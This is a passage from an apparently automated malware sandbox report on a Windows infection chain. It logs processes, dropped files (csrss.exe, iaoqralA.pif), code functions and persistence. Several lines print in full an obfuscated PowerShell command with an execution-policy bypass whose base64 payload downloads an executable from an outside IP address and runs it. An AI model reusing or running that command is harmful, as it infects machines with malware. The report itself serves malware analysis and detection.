iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"Jump to behavior
                        Source: iaoqralA.pif.12.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03813F9C LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,12_2_03813F9C
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07A11B75 pushad ; iretd 3_2_07A11B89
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0380C39A push 0380C7F2h; ret 12_2_0380C7EA
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0381539C push 038153D4h; ret 12_2_038153CC
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0380634E push 03806392h; ret 12_2_0380638A
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03806350 push 03806392h; ret 12_2_0380638A
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_038272AC push 03827317h; ret 12_2_0382730F
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03803210 push eax; ret 12_2_0380324C
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_038271F8 push 03827288h; ret 12_2_03827280
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03814100 push 03814138h; ret 12_2_03814130
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03827144 push 038271ECh; ret 12_2_038271E4
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_038270AC push 03827125h; ret 12_2_0382711D
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_038130AE push 0381315Bh; ret 12_2_03813153
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_038130B0 push 0381315Bh; ret 12_2_03813153
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0380F7D3 push 0380F821h; ret 12_2_0380F819
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0380F7D4 push 0380F821h; ret 12_2_0380F819
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0380F6C8 push 0380F73Eh; ret 12_2_0380F736
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0380C66C push 0380C7F2h; ret 12_2_0380C7EA
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_038125E4 push ecx; mov dword ptr [esp], edx12_2_038125E6
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03817484 push 038174BCh; ret 12_2_038174B4
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0381AA00 push ecx; mov dword ptr [esp], edx12_2_0381AA05
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0381AA64 push ecx; mov dword ptr [esp], edx12_2_0381AA69
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03805F82 push 03805FDFh; ret 12_2_03805FD7
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03805F84 push 03805FDFh; ret 12_2_03805FD7
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0380CFB4 push 0380CFE0h; ret 12_2_0380CFD8
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0380BFEC push ecx; mov dword ptr [esp], edx12_2_0380BFF1
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03813EBC push 03813EFEh; ret 12_2_03813EF6
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03825DF4 push 03825FEEh; ret 12_2_03825FE6
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_0040A0DF push edx; retf 17_2_0040A0E0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_0040114B push ecx; retf 17_2_0040114C
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_00401978 pushfd ; retf 17_2_0040197C
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_00414A67 push ecx; retf 17_2_00414A77

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Users\user\AppData\Roaming\csrss.exeFile created: C:\Users\user\Links\iaoqralA.pifJump to dropped file
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\csrss.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\csrss.exeFile created: C:\Users\user\Links\iaoqralA.pifJump to dropped file
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csrss[1].exeJump to dropped file
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\csrss.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.dllJump to dropped file

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_038178FC GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_038178FC
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
